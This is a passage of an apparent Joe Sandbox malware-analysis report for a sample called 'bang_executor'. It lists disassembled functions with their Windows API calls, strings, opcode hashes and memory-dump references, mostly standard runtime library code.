                                        • API ID: File$Close$AttributesCreateDeleteHandleProcess_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationOpenTimeToken
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 1577582944-3508440684
                                        • Opcode ID: 0fc808f4b04dcc16e376d463335cc0ee6eb75063b858d38dbf9c34c5d3233040
                                        • Instruction ID: f11b9fb99d22b620a1b0d42d65c22907f8184d905cc025e050080034f3bbac5a
                                        • Opcode Fuzzy Hash: 0fc808f4b04dcc16e376d463335cc0ee6eb75063b858d38dbf9c34c5d3233040
                                        • Instruction Fuzzy Hash: DED19671900289AFDF21DF62CC45BEFB7A8BF04705F00451EFA59E7281EB78A6448B65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050FF3E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: c9657f068cfaf4868a9126033aa66d97711c3c34c4085064a995c90d142d6f7d
                                        • Instruction ID: f91c51f7b601f3422ee14f97a6b475c0fc3430e90138071e1578e59cc82eaa64
                                        • Opcode Fuzzy Hash: c9657f068cfaf4868a9126033aa66d97711c3c34c4085064a995c90d142d6f7d
                                        • Instruction Fuzzy Hash: C4C23A71E046298FEB25CE289D447EABBB5FB84304F1555EAD44DE7280E7B4AEC18F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E3AB7 Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 677COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _swprintf
                                        • String ID: CMT$h%u$hc%u
                                        • API String ID: 589789837-3282847064
                                        • Opcode ID: e88f5ad1149b239e1117a1972517955c399cf358c916083adf3b45030f47aa46
                                        • Instruction ID: c1c6c3d659fb447e86b5650baf6b3693dc2428a2f90959a7050ee43b02f05d7f
                                        • Opcode Fuzzy Hash: e88f5ad1149b239e1117a1972517955c399cf358c916083adf3b45030f47aa46
                                        • Instruction Fuzzy Hash: C9421431A002C49EDF14DF76C885BEE7BA5AF54305F04047FEC4A9B282DB786A49CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E2FCB Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 830COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strlen.LIBCMT ref: 004E35C3
                                          • Part of subcall function 004F3D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,08ADEBCE,?,?,08ADEBCE,00000001,004EDA04,00000000,08ADEBCE,?,0001045C,?,?), ref: 004F3D2C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004E370D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 1610651222-2756464174
                                        • Opcode ID: 9a762a15843d714d493215fd9e8ce5ef061417762432fc73ebfebc3860844dd5
                                        • Instruction ID: 78d5aef9453c57f95520d10c1313c699a41f74cc96b4b79cf9ee253af696d226
                                        • Opcode Fuzzy Hash: 9a762a15843d714d493215fd9e8ce5ef061417762432fc73ebfebc3860844dd5
                                        • Instruction Fuzzy Hash: 02623771A002C48FCB16DF76C8896FE7BA1AF15306F08057FE84A9B382D7789A45CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00501FCA Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00501FD6
                                        • IsDebuggerPresent.KERNEL32 ref: 005020A2
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005020C2
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 005020CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: 504ae51cb36cbf5740804b62cd3d07362341e0c302df89c707afe16af5081867
                                        • Instruction ID: dadcde7ffd8268f6c557413aa722a3eaa348e06439a0d57e6d13e6c1ab46ba39
                                        • Opcode Fuzzy Hash: 504ae51cb36cbf5740804b62cd3d07362341e0c302df89c707afe16af5081867
                                        • Instruction Fuzzy Hash: 99311875D452199BDB20DFA4D98DBCCBBB8BF18300F1040AAE50DAB290EB715A88CF05
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • VirtualQuery.KERNEL32(80000000,00500AC5,0000001C,00500CBA,00000000,?,?,?,?,?,?,?,00500AC5,00000004,00545D24,00500D4A), ref: 00500B91
                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00500AC5,00000004,00545D24,00500D4A), ref: 00500BAC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: InfoQuerySystemVirtual
                                        • String ID: D
                                        • API String ID: 401686933-2746444292
                                        • Opcode ID: 6f0263e302a0fc09a8d43bd2b44342afb2f9c38800466bd67968410da6e4a54b
                                        • Instruction ID: 7b3edd5e2d3fe15aff61049ce4ea4661ce589e660e3b64bb3fdc71f45ea284f4
                                        • Opcode Fuzzy Hash: 6f0263e302a0fc09a8d43bd2b44342afb2f9c38800466bd67968410da6e4a54b
                                        • Instruction Fuzzy Hash: 2A01F7326401096FCB14DF29DC05FDE7BA9AFC4328F0CC124ED59D7284E634E805C680
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050647F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00506577
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00506581
                                        • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 0050658E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 0e7d2993898a31da79cd639aca6e087b23748621237c75b5a4f00f8210649bd6
                                        • Instruction ID: 7c44927ed5d146c7eb1ad85da39e8195b5af4e69d49d09d6a849f0755d5bba12
                                        • Opcode Fuzzy Hash: 0e7d2993898a31da79cd639aca6e087b23748621237c75b5a4f00f8210649bd6
                                        • Instruction Fuzzy Hash: 9831D374941229ABCB21DF64DC897CCBBB8BF48310F5041DAE80CA7291EB309B858F44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050FA90 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                        • Instruction ID: 810940f7a1d9efdf0f6149842db344ac41e95b8c79ce11f8decd3f2d503cf65a
                                        • Opcode Fuzzy Hash: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                        • Instruction Fuzzy Hash: B6022E72E002199BDF24CFA9C8906ADBBF5FF88314F258269D819E7785D730AD45CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FD0AB Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004FD0E1
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0052272C,?,?), ref: 004FD12A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: 33f2574111cf799ee8de6c4521f6bf111552bba787ff72a8338da062c5093f9e
                                        • Instruction ID: f84012683071fd4bdb0632bb739d5113e7c2584256be240f9a749eabdddc775b
                                        • Opcode Fuzzy Hash: 33f2574111cf799ee8de6c4521f6bf111552bba787ff72a8338da062c5093f9e
                                        • Instruction Fuzzy Hash: 7C113C39650308BBD711DF64DC46BEA77B8FF19704F00842AF901A72A1D6709A49DB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E7BFF Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(004E7D6C,?,00000400), ref: 004E7BFF
                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 004E7C20
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 599c60d69ba2d18dcfe3dc5b6b1610f79c6c09fff80cb458eee22822d03ecd8f
                                        • Instruction ID: b690d2d4b9e436b13d011e87e73db3ce25772e01ed780536bac201ae883bb2ca
                                        • Opcode Fuzzy Hash: 599c60d69ba2d18dcfe3dc5b6b1610f79c6c09fff80cb458eee22822d03ecd8f
                                        • Instruction Fuzzy Hash: 6CD0C971388340BBFA110B614C0AF6B779DAB69BA2F24C805B755E80E0D6749429B62D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00514044 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0051403F,?,?,00000008,?,?,00513CDF,00000000), ref: 00514271
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 175fe22884e89c50eb2d5af255b601c627bb7582132700a6a96d54fb7d5bc8d9
                                        • Instruction ID: 9e19ee56df7293145b9da7f270fb544505c296fde015d83b0bfbb454e68cc3d9
                                        • Opcode Fuzzy Hash: 175fe22884e89c50eb2d5af255b601c627bb7582132700a6a96d54fb7d5bc8d9
                                        • Instruction Fuzzy Hash: 68B13A356106099FE715CF28C48ABA57FA0FF45365F258658E8A9CF2A1C335E9D2CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004ED076 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 004ED0A7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: 3b73fa4ff1e94e369453545f533dd05e4b66249c0986b962b962a2a61f478aa4
                                        • Instruction ID: 3dbec2db7449407f85328165568b7c344f8209650677d06a8804989ab111124c
                                        • Opcode Fuzzy Hash: 3b73fa4ff1e94e369453545f533dd05e4b66249c0986b962b962a2a61f478aa4
                                        • Instruction Fuzzy Hash: 55014F74900608CFDB24CF24EC49A9D77B1FF69314F204219D91697391E734A50EDF45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E4C6E Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gj
                                        • API String ID: 0-4203073231
                                        • Opcode ID: 00caab01f3be782c5a8ca22f434476edc65adc9a37accb52b3af80efc131f376
                                        • Instruction ID: 891f63e6e30e69506cdcb13e59decfa3d17db1817791e40c5060112fcec3e8c6
                                        • Opcode Fuzzy Hash: 00caab01f3be782c5a8ca22f434476edc65adc9a37accb52b3af80efc131f376
                                        • Instruction Fuzzy Hash: A8D127B2A083458FC754CF2AD88065AFBE1FFC9308F59492EE998D7301D734A955CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050215D Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00022170,00501BC5), ref: 00502162
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: d310b2f9f42b76e36e67320d8596b3e82888a666a72fe5958c970ec5d1443b21
                                        • Instruction ID: c184dded0325369ac452a97fce203f293349c8310752b6cb341ebbfb9bc3c6fd
                                        • Opcode Fuzzy Hash: d310b2f9f42b76e36e67320d8596b3e82888a666a72fe5958c970ec5d1443b21
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F27A9 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 934ccf0cd4b67d897cb7c2438ec395f92651c0feaeced376863ec7c5dca47e2e
                                        • Instruction ID: 339d8e118cba9f6e0569eac9842d563d39c893e6fed15ad18cd07b15d319b9c5
                                        • Opcode Fuzzy Hash: 934ccf0cd4b67d897cb7c2438ec395f92651c0feaeced376863ec7c5dca47e2e
                                        • Instruction Fuzzy Hash: 0411607190470A9BD768DF59894576BF7E4FB00304F10C92FD2A6E2280C3B8A540CB05
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050E680 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
